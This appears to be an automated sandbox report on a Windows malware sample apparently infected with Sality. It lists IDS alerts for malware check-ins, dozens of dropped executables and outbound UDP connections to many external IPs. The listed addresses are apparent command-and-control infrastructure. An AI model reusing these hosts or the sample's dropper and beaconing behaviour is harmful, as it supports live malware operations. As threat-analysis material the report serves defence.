        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49716 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49814 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49732 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49722 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49835 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49726 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49722 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49842 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49842 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49726 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49723 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49861 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49741 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49741 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49870 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49727 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49870 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49918 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49889 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49927 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49724 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49735 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49789 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49789 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49724 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50039 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50037 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50039 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50036 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50049 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49899 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49899 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50045 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50037 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49927 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50056 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:49867 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50040 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50051 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50043 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50045 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50056 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50042 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50028 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50043 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50028 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49949 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50050 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50050 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50041 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49983 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50064 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50061 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49983 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:50031 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:50063 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50041 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50027 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50030 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50030 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50038 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50052 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50052 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50029 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50059 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50001 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50032 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50053 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50034 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50033 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50033 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50007 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50007 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49721 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50035 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50035 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50057 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50055 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50062 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50062 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49977 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49740 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50048 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50054 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50054 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50058 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50058 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50048 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:50047 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49955 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49955 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50044 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50060 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50060 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50046 -> 185.53.178.50:80
        Creates HTML files with .exe extension (expired dropper behavior)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: winxqvw.exe.1.dr
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: pityxd.exe.1.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: nimgtv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winbsswvu.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: ypxuf.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winclhyg.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: hqsb.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winfuyf.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winixhla.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: unirvw.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: wingyqbqr.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: nyxrw.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: lmto.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winpderh.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: kpmw.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winsjay.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winlggu.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: qbcecv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winrbmrvn.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: rfnd.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winqhhdp.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winlakaf.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winguwxpv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winglraj.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winidlrll.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: wincrely.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winbyxwrs.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winpggs.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: ognr.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winevrmk.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winruhhak.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: kyre.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winchbv.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: winiwxwcq.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: oktye.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: dliyqj.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: ngpa.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: mlhr.exe.10.dr
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: jnptrh.exe.10.dr
        Uses ping.exe to check the status of other devices and networks
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: unknownNetwork traffic detected: IP country count 27
        Source: global trafficTCP traffic: 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: global trafficUDP traffic: 192.168.2.9:55596 -> 94.76.206.19:1473
        Source: global trafficUDP traffic: 192.168.2.9:55597 -> 46.45.148.196:5683
        Source: global trafficUDP traffic: 192.168.2.9:55598 -> 83.222.184.130:5750
        Source: global trafficUDP traffic: 192.168.2.9:55599 -> 58.140.114.152:5010
        Source: global trafficUDP traffic: 192.168.2.9:55600 -> 80.178.242.19:4630
        Source: global trafficUDP traffic: 192.168.2.9:60196 -> 61.95.152.112:6800
        Source: global trafficUDP traffic: 192.168.2.9:60197 -> 220.94.117.230:7066
        Source: global trafficUDP traffic: 192.168.2.9:60198 -> 58.85.93.82:4840
        Source: global trafficUDP traffic: 192.168.2.9:50097 -> 195.42.129.188:4876
        Source: global trafficUDP traffic: 192.168.2.9:50098 -> 81.180.90.149:9674
        Source: global trafficUDP traffic: 192.168.2.9:50099 -> 113.190.137.239:8112
        Source: global trafficUDP traffic: 192.168.2.9:50100 -> 89.45.97.101:4375
        Source: global trafficUDP traffic: 192.168.2.9:50101 -> 203.110.84.90:4882
        Source: global trafficUDP traffic: 192.168.2.9:50102 -> 121.243.130.85:6989
        Source: global trafficUDP traffic: 192.168.2.9:50103 -> 124.123.112.184:6219
        Source: global trafficUDP traffic: 192.168.2.9:50104 -> 121.135.15.57:4611
        Source: global trafficUDP traffic: 192.168.2.9:62327 -> 122.169.249.87:5878
        Source: global trafficUDP traffic: 192.168.2.9:62328 -> 183.83.119.156:6511
        Source: global trafficUDP traffic: 192.168.2.9:62329 -> 195.174.68.81:6296
        Source: global trafficUDP traffic: 192.168.2.9:62330 -> 77.81.225.89:6380
        Source: global trafficUDP traffic: 192.168.2.9:62331 -> 195.174.143.33:5960
        Source: global trafficUDP traffic: 192.168.2.9:62332 -> 117.239.49.110:5415
        Source: global trafficUDP traffic: 192.168.2.9:62333 -> 115.119.58.98:5310
        Source: global trafficUDP traffic: 192.168.2.9:62334 -> 93.114.177.116:4876
        Source: global trafficUDP traffic: 192.168.2.9:50175 -> 124.30.139.5:4294
        Source: global trafficUDP traffic: 192.168.2.9:60516 -> 95.64.101.42:5285
        Source: global trafficUDP traffic: 192.168.2.9:60517 -> 189.35.177.247:4490
        Source: global trafficUDP traffic: 192.168.2.9:60518 -> 95.76.49.203:4440
        Source: global trafficUDP traffic: 192.168.2.9:60519 -> 121.162.97.129:4900
        Source: global trafficUDP traffic: 192.168.2.9:60520 -> 115.98.98.230:5220
        Source: global trafficUDP traffic: 192.168.2.9:60521 -> 122.99.102.253:4980
        Source: global trafficUDP traffic: 192.168.2.9:60522 -> 77.81.224.130:7023
        Source: global trafficUDP traffic: 192.168.2.9:56722 -> 89.41.154.115:5038
        Source: global trafficUDP traffic: 192.168.2.9:56723 -> 89.45.96.223:5614
        Source: global trafficUDP traffic: 192.168.2.9:56724 -> 195.239.22.166:6065
        Source: global trafficUDP traffic: 192.168.2.9:56725 -> 188.215.26.241:6260
        Source: global trafficUDP traffic: 192.168.2.9:56726 -> 93.114.228.238:5959
        Source: global trafficUDP traffic: 192.168.2.9:56727 -> 46.248.223.58:5545
        Source: global trafficUDP traffic: 192.168.2.9:56728 -> 77.81.228.77:6130
        Source: global trafficUDP traffic: 192.168.2.9:56729 -> 77.81.228.140:5960
        Source: global trafficUDP traffic: 192.168.2.9:51188 -> 81.199.91.188:4980
        Source: global trafficUDP traffic: 192.168.2.9:51189 -> 190.111.22.45:6065
        Source: global trafficUDP traffic: 192.168.2.9:51190 -> 85.204.112.3:6244
        Source: global trafficUDP traffic: 192.168.2.9:51191 -> 183.83.90.202:5218
        Source: global trafficUDP traffic: 192.168.2.9:51192 -> 178.233.92.89:4980
        Source: global trafficUDP traffic: 192.168.2.9:51193 -> 196.201.129.61:5078
        Source: global trafficUDP traffic: 192.168.2.9:51194 -> 195.46.33.124:6538
        Source: global trafficUDP traffic: 192.168.2.9:51195 -> 94.55.239.88:5549
        Source: global trafficUDP traffic: 192.168.2.9:63759 -> 94.45.101.168:5141
        Source: global trafficUDP traffic: 192.168.2.9:63760 -> 89.44.211.209:5740
        Source: global trafficUDP traffic: 192.168.2.9:51128 -> 195.174.138.61:5636
        Source: global trafficUDP traffic: 192.168.2.9:51129 -> 77.122.97.232:5548
        Source: global trafficUDP traffic: 192.168.2.9:51130 -> 195.189.154.148:5549
        Source: global trafficUDP traffic: 192.168.2.9:51131 -> 122.169.104.90:7866
        Source: global trafficUDP traffic: 192.168.2.9:51132 -> 187.13.32.46:7866
        Source: global trafficUDP traffic: 192.168.2.9:51133 -> 195.189.209.77:6364
        Source: global trafficUDP traffic: 192.168.2.9:61218 -> 196.201.128.232:5376
        Source: global trafficUDP traffic: 192.168.2.9:61219 -> 14.46.86.152:8012
        Source: global trafficUDP traffic: 192.168.2.9:61220 -> 189.43.156.4:5285
        Source: global trafficUDP traffic: 192.168.2.9:61221 -> 86.55.89.177:8100
        Source: global trafficUDP traffic: 192.168.2.9:61222 -> 79.114.248.250:6780
        Source: global trafficUDP traffic: 192.168.2.9:61223 -> 195.144.14.69:6704
        Source: global trafficUDP traffic: 192.168.2.9:61224 -> 187.0.231.113:5293
        Source: global trafficUDP traffic: 192.168.2.9:61225 -> 85.122.42.91:6390
        Source: global trafficUDP traffic: 192.168.2.9:64328 -> 94.62.138.226:4596
        Source: global trafficUDP traffic: 192.168.2.9:64329 -> 95.64.85.169:6636
        Source: global trafficUDP traffic: 192.168.2.9:64330 -> 189.56.86.165:8032
        Source: global trafficUDP traffic: 192.168.2.9:64331 -> 201.92.253.229:6870
        Source: global trafficUDP traffic: 192.168.2.9:64332 -> 113.21.72.31:6832
        Source: global trafficUDP traffic: 192.168.2.9:64333 -> 89.34.99.99:6964
        Source: global trafficUDP traffic: 192.168.2.9:64334 -> 200.216.212.147:7866
        Source: global trafficUDP traffic: 192.168.2.9:64335 -> 77.81.232.22:5107
        Source: global trafficUDP traffic: 192.168.2.9:63317 -> 93.114.176.239:4570
        Source: global trafficUDP traffic: 192.168.2.9:63318 -> 124.123.92.252:7451
        Source: global trafficUDP traffic: 192.168.2.9:63319 -> 118.94.216.63:5708
        Source: global trafficUDP traffic: 192.168.2.9:50688 -> 183.83.188.123:6870
        Source: global trafficUDP traffic: 192.168.2.9:50912 -> 90.148.247.149:4410
        Source: global trafficUDP traffic: 192.168.2.9:57248 -> 183.82.146.144:6420
        Source: global trafficUDP traffic: 192.168.2.9:57249 -> 187.13.131.28:6832
        Source: global trafficUDP traffic: 192.168.2.9:57250 -> 211.107.173.111:7374
        Source: global trafficUDP traffic: 192.168.2.9:57251 -> 92.241.90.238:6373
        Source: global trafficUDP traffic: 192.168.2.9:64124 -> 188.26.1.21:4823
        Source: global trafficUDP traffic: 192.168.2.9:64125 -> 109.124.19.10:4770
        Source: global trafficUDP traffic: 192.168.2.9:64126 -> 217.219.117.8:7119
        Source: global trafficUDP traffic: 192.168.2.9:64127 -> 84.22.25.227:4343
        Source: global trafficUDP traffic: 192.168.2.9:64128 -> 27.3.6.5:8260
        Source: global trafficUDP traffic: 192.168.2.9:64129 -> 201.58.235.159:5372
        Source: global trafficUDP traffic: 192.168.2.9:64130 -> 183.82.176.250:5130
        Source: global trafficUDP traffic: 192.168.2.9:59472 -> 14.96.209.63:5734
        Source: global trafficUDP traffic: 192.168.2.9:62137 -> 93.94.54.35:4441
        Source: global trafficUDP traffic: 192.168.2.9:62138 -> 189.12.181.188:7119
        Source: global trafficUDP traffic: 192.168.2.9:62139 -> 193.140.107.175:8030
        Source: global trafficUDP traffic: 192.168.2.9:62140 -> 89.34.124.109:5684
        Source: global trafficUDP traffic: 192.168.2.9:62141 -> 196.200.62.20:5127
        Source: global trafficUDP traffic: 192.168.2.9:62142 -> 123.237.94.47:4579
        Source: global trafficUDP traffic: 192.168.2.9:62143 -> 178.22.169.142:6389
        Source: global trafficUDP traffic: 192.168.2.9:54339 -> 203.122.23.55:7046
        Source: global trafficUDP traffic: 192.168.2.9:54340 -> 89.32.53.124:5460
        Source: global trafficUDP traffic: 192.168.2.9:54341 -> 58.147.170.86:6554
        Source: global trafficUDP traffic: 192.168.2.9:54342 -> 196.20.112.81:6621
        Source: global trafficUDP traffic: 192.168.2.9:54343 -> 123.237.93.73:6500
        Source: global trafficUDP traffic: 192.168.2.9:54344 -> 27.2.3.124:5295
        Source: global trafficUDP traffic: 192.168.2.9:55361 -> 196.200.62.30:6455
        Source: global trafficUDP traffic: 192.168.2.9:58545 -> 124.125.109.155:5127
        Source: global trafficUDP traffic: 192.168.2.9:58546 -> 58.72.195.130:4900
        Source: global trafficUDP traffic: 192.168.2.9:58547 -> 151.56.26.254:8100
        Source: global trafficUDP traffic: 192.168.2.9:58548 -> 41.250.185.19:5446
        Source: global trafficUDP traffic: 192.168.2.9:55615 -> 178.123.176.220:6219
        Source: global trafficUDP traffic: 192.168.2.9:55616 -> 31.140.4.130:8804
        Source: global trafficUDP traffic: 192.168.2.9:55617 -> 93.113.189.169:5204
        Source: global trafficUDP traffic: 192.168.2.9:55618 -> 81.90.238.197:6195
        Source: global trafficUDP traffic: 192.168.2.9:55619 -> 212.150.50.138:5820
        Source: global trafficUDP traffic: 192.168.2.9:54924 -> 89.179.33.87:6130
        Source: global trafficUDP traffic: 192.168.2.9:54925 -> 200.241.176.189:5285
        Source: global trafficUDP traffic: 192.168.2.9:57680 -> 41.251.18.107:6840
        Source: global trafficUDP traffic: 192.168.2.9:57681 -> 78.106.189.148:40036
